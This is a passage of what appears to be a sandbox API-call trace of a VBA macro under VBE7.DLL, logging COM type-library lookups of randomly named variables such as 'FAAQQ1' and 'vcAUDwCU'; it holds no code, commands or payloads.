_Dst="_B_var_BDGokAwo") returned 0x0 [0068.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_BDGokAwo") returned 16 [0068.542] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.542] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_BDGokAwo", lHashVal=0x105337, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.542] IUnknown:Release (This=0x665ba50) returned 0xb [0068.542] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.542] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_BDGokAwo", lHashVal=0x105337, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.542] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.542] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.542] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_BDGokAwo", lHashVal=0x105337, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.543] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.543] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.543] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_BDGokAwo", lHashVal=0x105337, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.543] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.543] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.543] IUnknown:Release (This=0x665ba50) returned 0xb [0068.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc223a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_BDGokAwo") returned 16 [0068.543] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_BDGokAwo", lHashVal=0x105337, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x42005f00720061, ppTypeComp=0x6b006f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x42005f00720061, ppTypeComp=0x6b006f00000000, pDummy=0x0) returned 0x0 [0068.543] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2d46 | out: _Dst=0x145020) returned 0x0 [0068.543] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FAAQQ1", lHashVal=0x101f90, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d72, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="FAAQQ1") returned 7 [0068.543] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FAAQQ1", lHashVal=0x101f90, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d72, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="FAAQQ1") returned 7 [0068.543] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FAAQQ1", lHashVal=0x101f90, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.543] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAAQQ1") returned 0x101f90 [0068.543] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="FAAQQ1" | out: _Dst="FAAQQ1") returned 0x0 [0068.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="FAAQQ1") returned 7 [0068.543] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.543] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FAAQQ1", lHashVal=0x101f90, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.543] IUnknown:Release (This=0x665ba50) returned 0xb [0068.543] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.544] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FAAQQ1", lHashVal=0x101f90, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.544] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.544] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.544] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FAAQQ1", lHashVal=0x101f90, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.544] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.544] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.544] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FAAQQ1", lHashVal=0x101f90, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.544] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d72, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="FAAQQ1") returned 7 [0068.544] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FAAQQ1", lHashVal=0x101f90, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.544] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.544] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2d72 | out: _Dst=0x67c2d40) returned 0x0 [0068.544] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FAAQQ1") returned 0x109a39 [0068.544] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_FAAQQ1" | out: _Dst="_B_var_FAAQQ1") returned 0x0 [0068.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_FAAQQ1") returned 14 [0068.544] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.544] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FAAQQ1", lHashVal=0x109a39, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.544] IUnknown:Release (This=0x665ba50) returned 0xb [0068.544] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.544] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FAAQQ1", lHashVal=0x109a39, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.544] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.544] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.544] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FAAQQ1", lHashVal=0x109a39, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.544] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.544] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.544] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FAAQQ1", lHashVal=0x109a39, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.544] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.544] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.544] IUnknown:Release (This=0x665ba50) returned 0xb [0068.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc226a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_FAAQQ1") returned 14 [0068.545] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FAAQQ1", lHashVal=0x109a39, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x46005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x46005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0) returned 0x0 [0068.545] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2d72 | out: _Dst=0x145020) returned 0x0 [0068.545] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vcAUDwCU", lHashVal=0x101acd, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d9a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="vcAUDwCU") returned 9 [0068.545] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vcAUDwCU", lHashVal=0x101acd, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d9a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="vcAUDwCU") returned 9 [0068.545] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vcAUDwCU", lHashVal=0x101acd, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.545] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vcAUDwCU") returned 0x101acd [0068.545] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="vcAUDwCU" | out: _Dst="vcAUDwCU") returned 0x0 [0068.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="vcAUDwCU") returned 9 [0068.545] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.545] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vcAUDwCU", lHashVal=0x101acd, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.545] IUnknown:Release (This=0x665ba50) returned 0xb [0068.545] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.545] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vcAUDwCU", lHashVal=0x101acd, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.545] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.545] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.545] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vcAUDwCU", lHashVal=0x101acd, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.545] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.545] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.545] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vcAUDwCU", lHashVal=0x101acd, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.545] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2d9a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="vcAUDwCU") returned 9 [0068.546] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vcAUDwCU", lHashVal=0x101acd, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.546] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.546] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2d9a | out: _Dst=0x67c2d40) returned 0x0 [0068.546] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vcAUDwCU") returned 0x10f295 [0068.546] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_vcAUDwCU" | out: _Dst="_B_var_vcAUDwCU") returned 0x0 [0068.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_vcAUDwCU") returned 16 [0068.546] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.546] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vcAUDwCU", lHashVal=0x10f295, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.546] IUnknown:Release (This=0x665ba50) returned 0xb [0068.546] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.546] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vcAUDwCU", lHashVal=0x10f295, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.546] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.546] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.546] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vcAUDwCU", lHashVal=0x10f295, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.546] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.546] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.546] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vcAUDwCU", lHashVal=0x10f295, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.546] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.546] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.546] IUnknown:Release (This=0x665ba50) returned 0xb [0068.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc229a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_vcAUDwCU") returned 16 [0068.546] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vcAUDwCU", lHashVal=0x10f295, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x76005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x76005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0) returned 0x0 [0068.546] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2d9a | out: _Dst=0x145020) returned 0x0 [0068.547] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.547] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.547] IUnknown:Release (This=0x665ba50) returned 0xb [0068.547] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.547] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.547] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.547] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.547] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.547] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.547] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.547] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.547] IUnknown:Release (This=0x665ba50) returned 0xb [0068.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.547] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.547] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.548] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.548] IUnknown:Release (This=0x665ba50) returned 0xb [0068.548] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.548] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.548] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.548] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.548] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.548] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.548] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.548] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.548] IUnknown:Release (This=0x665ba50) returned 0xb [0068.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.548] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.548] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.548] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.548] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.548] IUnknown:Release (This=0x665ba50) returned 0xb [0068.548] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.548] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.548] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.548] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.549] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.549] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.549] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.549] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.549] IUnknown:Release (This=0x665ba50) returned 0xb [0068.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.549] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.549] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.549] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.549] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.549] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.550] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.550] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.550] IUnknown:Release (This=0x665ba50) returned 0xb [0068.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, 